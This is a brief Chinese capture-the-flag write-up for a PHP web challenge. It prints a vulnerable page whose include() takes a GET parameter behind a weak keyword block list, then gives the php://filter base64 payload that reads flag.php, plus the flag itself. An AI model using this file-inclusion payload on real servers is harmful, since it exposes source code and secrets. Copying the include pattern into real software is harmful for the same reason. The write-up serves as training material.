题目
查看页面源代码
有个Archive_room.php文件直接打开访问
抓包拦截返回包
有个302跳转,注释里有个secr3t.php,
访问secr3t.php文件
<html><title>secret</title><meta charset="UTF-8">
<?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file);
//flag放在了flag.php里
?>
</html>
看到include函数,直接PHP伪协议读取flag
?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码
拿下flag
flag{f4b454ff-7cae-440e-ad70-3b3cd3117032}